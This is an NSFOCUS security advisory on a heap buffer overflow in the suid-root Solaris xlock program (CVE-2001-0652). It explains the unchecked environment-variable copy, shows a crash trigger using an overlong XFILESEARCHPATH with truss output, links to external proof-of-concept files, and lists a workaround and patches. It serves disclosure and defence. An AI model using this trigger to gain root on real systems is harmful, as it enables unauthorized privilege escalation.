|
| |
NSFOCUS Security Advisory(SA2001-05)
Topic: Solaris Xlock Heap Overflow Vulnerability
Release Date: 2001-08-10
CVE ID : CVE-2001-0652
BUGTRAQ ID : 3160
Affected system:
================
Sun Solaris 2.6 (SPARC/x86)
Sun Solaris 7 (SPARC/x86)
Sun Solaris 8 (SPARC/x86)
Impact:
=====
NSFOCUS Security Team has found a heap buffer overflow vulnerability in the
xlock shipped in Solaris system when handling some environment variables.
Exploitation of it would allow a local attacker to obtain root privilege.
Description:
========
Xlock is a screen-locking tool of Solaris OpenView. It locks the X server until
a password is entered. It is installed suid root by default.
It has an invalid boundary check in some environment variable handling. As the
result, an attacker could overwrite dynamic memory boundary of heap area,
run arbitrary code as root with carefully constructed overflow data.
The problem is within these two environment variables: "XFILESEARCHPATH" and
"XUSERFILESEARCHPATH". Xlock calls malloc() to allocate 1024 bytes memory and
save the environment variable value in this dynamic memory. But xlock does not
provide length check of environment variable when copying. In case that these
two environment variables are set to be a string longer than 1024 bytes, a heap
overflow might occur. Adjacent dynamic memory boundary tags could be
overwritten, and segment fault would occur when malloc() is called next time.
Some special "feature" of libc malloc()/free() implementation could be used to
rewrite arbitrary memory like saved returned address and function pointer or
other important data with carefully formed overflow data.
Exploiting this vulnerability successfully would give an attacker root privilege.
Exploit:
=====
bash-2.03$ uname -a
SunOS sun8 5.8 Generic sun4u sparc SUNW,Ultra-5_10
bash-2.03$ cp /usr/openwin/bin/xlock /tmp/xlock
bash-2.03$ export XFILESEARCHPATH=`perl -e 'print "A"x1028'`
bash-2.03$ /tmp/xlock
Segmentation Fault
bash-2.03$ truss -u libc:malloc,free /tmp/xlock
<...snip...>
<- libc:malloc() = 0x1135d0
-> libc:malloc(0x400, 0xffbefa8d, 0xffffffff, 0x1b648)
<- libc:malloc() = 0x1139d0
open("AAAAAAA...AAAAAAAAAAAAAAA", O_RDONLY) Err#78 ENAMETOOLONG
-> libc:free(0x1139d0, 0x0, 0xff31c000, 0x1b648)
<- libc:free() = 0
-> libc:malloc(0x400, 0x12, 0x0, 0x10ed49)
<- libc:malloc() = 0x1139d0
open("/export/home/test/XLock", O_RDONLY) Err#2 ENOENT
-> libc:free(0x1139d0, 0x0, 0xff31c000, 0x7efefeff)
<- libc:free() = 0
-> libc:malloc(0x3, 0x3073b, 0xffffffff, 0x3a300000)
<- libc:malloc() = 0x1135e0
Incurred fault #6, FLTBOUNDS %pc = 0xFF0C0F4C
siginfo: SIGSEGV SEGV_MAPERR addr=0x41527F18
Received signal #11, SIGSEGV [default]
siginfo: SIGSEGV SEGV_MAPERR addr=0x41527F18
*** process killed ***
Proof of concept codes for this issue will be available at:
http://www.nsfocus.com/proof/sol_sparc_xlockex.c
http://www.nsfocus.com/proof/sol_x86_xlockex.c
Workaround:
========
Drop the suid root attribute of xlock:
# chmod a-s /usr/openwin/bin/xlock
Vendor Status:
==========
2001.6.11 We informed Sun of this problem.
2001.6.14 Sun replied that the problem had been reproduced and they
had started to develop relevant patches.
2001.8.8 Sun informed us that the development of patches had finished and
would be released at the end of the month.
2001.8.9 Sun provided us with IDs of the patches to be released.
Sun's patches to be released for this vulnerability:
SPARC x86
--------- ---------
Solaris 8 108652-38 108653-33
Solaris 7 108376-30 108377-26
Solaris 2.6 105633-60 106248-45
Security patches of Sun Inc. are available at:
http://sunsolve.sun.com/securitypatch
Additional Information:
===============
The Common Vulnerabilities and Exposures (CVE) project has
assigned the name CVE-2001-0652 to this issue. This is a
candidate for inclusion in the CVE list (http://cve.mitre.org),
which standardizes names for security problems. Candidates
may change significantly before they become official CVE entries.
|
| |
|
| |
DISCLAIMS:
THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENTSHALL NSFOCUS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF USINESS PROFITS OR SPECIAL DAMAGES, EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. DISTRIBUTION OR REPRODUCTION OF THE INFORMATION IS PROVIDED THAT THE ADVISORY IS NOT MODIFIED IN ANY WAY.
Copyright 1999-2003 NSFOCUS. All Rights Reserved. Terms of use.
NSFOCUS Security Team <security@nsfocus.com>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
(http://www.nsfocus.com)
PGP Key: http://www.nsfocus.com/homepage/research/pgpkey.asc
Key fingerprint = F8F2 F5D1 EF74 E08C 02FE 1B90 D7BF 7877 C6A6 F6DA |
|
|
